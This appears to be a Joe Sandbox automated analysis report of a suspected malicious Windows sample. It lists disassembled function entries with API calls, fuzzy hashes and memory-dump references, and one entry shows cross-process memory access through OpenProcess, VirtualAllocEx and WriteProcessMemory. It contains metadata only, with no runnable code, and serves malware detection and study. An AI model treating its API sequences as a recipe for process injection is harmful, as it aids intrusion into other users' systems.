Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
Instruction ID: 8a1256e0aecdf14aa6c4f4beab4c2806aa620a91b813a528773de1c84d1aad7c
Opcode Fuzzy Hash: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
Instruction Fuzzy Hash: 7E21A735A00204AFD700EFA5C945A5EB7E5EF48305F04887DEC49A7252DF74EC04CB54

Function 0042217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004221A9
CreateThread.KERNEL32(?,?,004222DF,00000000,?,?), ref: 004221ED
GetLastError.KERNEL32 ref: 004221F7
_free.LIBCMT ref: 00422200
__dosmaperr.LIBCMT ref: 0042220B

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: fe78e4b33934f2f665193501f35f76f7858f28a7d68122209891d7eb0561a6b8
Instruction ID: c22bb6fff56d961d5c9c29188316b6b7028ddab09764e3de592cdea5f7742925
Opcode Fuzzy Hash: fe78e4b33934f2f665193501f35f76f7858f28a7d68122209891d7eb0561a6b8
Instruction Fuzzy Hash: 79112932304326BF9B10AFA6BD41D6B3798EF00734750042FF91497192DBBA981187A8

Function 0043ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
Instruction ID: 9a6f70c041a44a4f9a827da56d6e218984a148510de144741497beb3d206d3d0
Opcode Fuzzy Hash: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
Instruction Fuzzy Hash: D4016970641204BFDB115FA9EC8CDAB3BACFF8A354B10182EF955D32A0DA718C50CB68

Function 00447A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00447A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00447A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00447A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 9096d10b09d4d2df299d12543b3ca86d9efde44fc0486633c2803926555982e9
Instruction ID: 9df7a410ece83edb3699c7793a5c23df94053d579fcd3f16084c42eae6cef0d8
Opcode Fuzzy Hash: 9096d10b09d4d2df299d12543b3ca86d9efde44fc0486633c2803926555982e9
Instruction Fuzzy Hash: 19018071C05619DBDF00AFE4DC4C9DDBB78FF08711F00495AD502B2290DB389651C7A9

Function 00439ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00439ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00439AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00439B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00439B15
CLSIDFromString.OLE32(?,?), ref: 00439B21

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 89d454ae4780ac1dd4fe31ccf9d2996fb633b50112b37b9739d33278ec798fca
Instruction ID: 87913f96beddb0d4d16c11972130365a8c83d4fec8f93c347dd2fca7273abf86
Opcode Fuzzy Hash: 89d454ae4780ac1dd4fe31ccf9d2996fb633b50112b37b9739d33278ec798fca
Instruction Fuzzy Hash: 3E018F76A01204BFDB105F58EC44B9EBBEDEB4C352F144439F905D2250D7B4ED009BA4

Function 0043AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
Instruction ID: 974b26daf64f8dbf61396155943fd57f6b72a90fe55d440549507bfb75707d11
Opcode Fuzzy Hash: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
Instruction Fuzzy Hash: 91F0AF322412046FEB102FA4AC8CE6B3BACFF4E754F10082EF941C7290DB619C15CB65

Function 0043AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0043AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AB10

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
Instruction ID: 146aa33a93239cb99623a1635ed7780d23d82dc7e0fdc4ba1386104819eb8aef
Opcode Fuzzy Hash: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
Instruction Fuzzy Hash: A3F04F71641208AFEB110FA4EC8CE6B7B6DFF4A754F10053EFA51C7290DB65AC118B65

Function 0043EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0043EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0043ECAB
MessageBeep.USER32(00000000), ref: 0043ECC3
KillTimer.USER32(?,0000040A), ref: 0043ECDF
EndDialog.USER32(?,00000001), ref: 0043ECF9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
Instruction ID: 98597da713e12d6dfb059cec58a8c53e20aa62e351f3c557d6efc3328c67b8a1
Opcode Fuzzy Hash: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
Instruction Fuzzy Hash: 28018630901704ABEB245B51DE4EB9A7778FF04705F00196EB543714E1DBF4A945CB48

Function 0041B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0041B0BA
StrokeAndFillPath.GDI32(?,?,0047E680,00000000,?,?,?), ref: 0041B0D6
SelectObject.GDI32(?,00000000), ref: 0041B0E9
DeleteObject.GDI32 ref: 0041B0FC
StrokePath.GDI32(?), ref: 0041B117

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
Instruction ID: 305292cf3701eb74ee210533d413ef74276f9a5688495286bd354ebed6b62e2e
Opcode Fuzzy Hash: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
Instruction Fuzzy Hash: F8F01930201204EFCB61AF65EC4CB993F65EB02366F088329E465841F2C7348996DF5C

Function 0044F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0044F2DA
CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044F2F2
CoUninitialize.OLE32 ref: 0044F555

Strings

.lnk, xrefs: 0044F28B, 0044F290, 0044F29E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 81dbf9ed2543da613c77d7bef0e01e818b87c6a9cd27bbee5f6acd628e7327a1
Instruction ID: 4d7391de075464714a8c3291d240941207e243e8aeb7da400a877c7a430c7a2f
Opcode Fuzzy Hash: 81dbf9ed2543da613c77d7bef0e01e818b87c6a9cd27bbee5f6acd628e7327a1
Instruction Fuzzy Hash: ACA14DB1504201AFD300EF65C881EAFB7ECEF98318F00492EF55597192EB74EA49CB96

Function 0044E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

CoInitialize.OLE32(00000000), ref: 0044E85D
CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044E876
CoUninitialize.OLE32 ref: 0044E893

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Strings

.lnk, xrefs: 0044E83B, 0044E84D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: b41776f7e27376259126802139b15c544f7a21ad51d83b307521d4d948d136fa
Instruction ID: 10c43b87b23ce4038536d43f928ead2d0a8ecdf508b023c31232c5178fa219cf
Opcode Fuzzy Hash: b41776f7e27376259126802139b15c544f7a21ad51d83b307521d4d948d136fa
Instruction Fuzzy Hash: 7EA166756043019FDB10EF25C48491EBBE5BF88314F14895EF996AB3A2CB35EC45CB85

Function 0042325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004232ED

Part of subcall function 0042E0D0: __87except.LIBCMT ref: 0042E10B

Strings

pow, xrefs: 004232C5, 004232E2

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
Instruction ID: 1a21917130ddbb47f9248a99b6df19eade1bd1d8620e4c39e32b257b59b9eced
Opcode Fuzzy Hash: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
Instruction Fuzzy Hash: 43515961B08221D2CB15BF15F90137B2BA49B40711FE04DBBE8C6823E9DF7C8E95965E

Function 00401F21 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

+, xrefs: 00401F5D
#, xrefs: 00401F64

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 12bf08725723b06297b6d8fdd69a558e7d1b99e63bd60bf200693ababd18c7ae
Instruction ID: b6c0566d026e52d963130f25eea2b8aca2619b6060b8c8884f829408a808e0e6
Opcode Fuzzy Hash: 12bf08725723b06297b6d8fdd69a558e7d1b99e63bd60bf200693ababd18c7ae
Instruction Fuzzy Hash: F4510F715002069FDB25DF28C486AEB3BA4AF65314F14806BECC1AB3E0D77C9E42D769

Function 00444606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0049DC50,?,0000000F,0000000C,00000016,0049DC50,?), ref: 00444645

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 004446C5

Strings

REMOVE, xrefs: 00444676
THIS, xrefs: 00444703

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
Instruction ID: 598861723889322f2b36ecddc1b796b6f6d96aabc3fe50002778cc507f541961
Opcode Fuzzy Hash: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
Instruction Fuzzy Hash: DE419874A001199FDF00DF65C881AAEB7B5FF89308F14806EE915AB392DB38DD46CB58

Function 0043C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC08,?,?,00000034,00000800,?,00000034), ref: 00444335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0043C1D3

Part of subcall function 004442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00444300

Part of subcall function 0044422F: GetWindowThreadProcessId.USER32(?,?), ref: 0044425A
Part of subcall function 0044422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0044426A
Part of subcall function 0044422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00444280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C28D

Strings

@, xrefs: 0043C2A5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
Instruction ID: 3f4c4a65faee7a5d8857929f5e28f96f4fee7115f0a52c3415428020ef33ee1d
Opcode Fuzzy Hash: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
Instruction Fuzzy Hash: 0C413976A0021CAFDB10DFA4CD81BEEB7B8BF49704F00409AFA45B7181DA756E45CB65

Function 0046A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0049DC00,00000000,?,?,?,?), ref: 0046A6D8
GetWindowLongW.USER32 ref: 0046A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0046A705

Strings

SysTreeView32, xrefs: 0046A6AA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
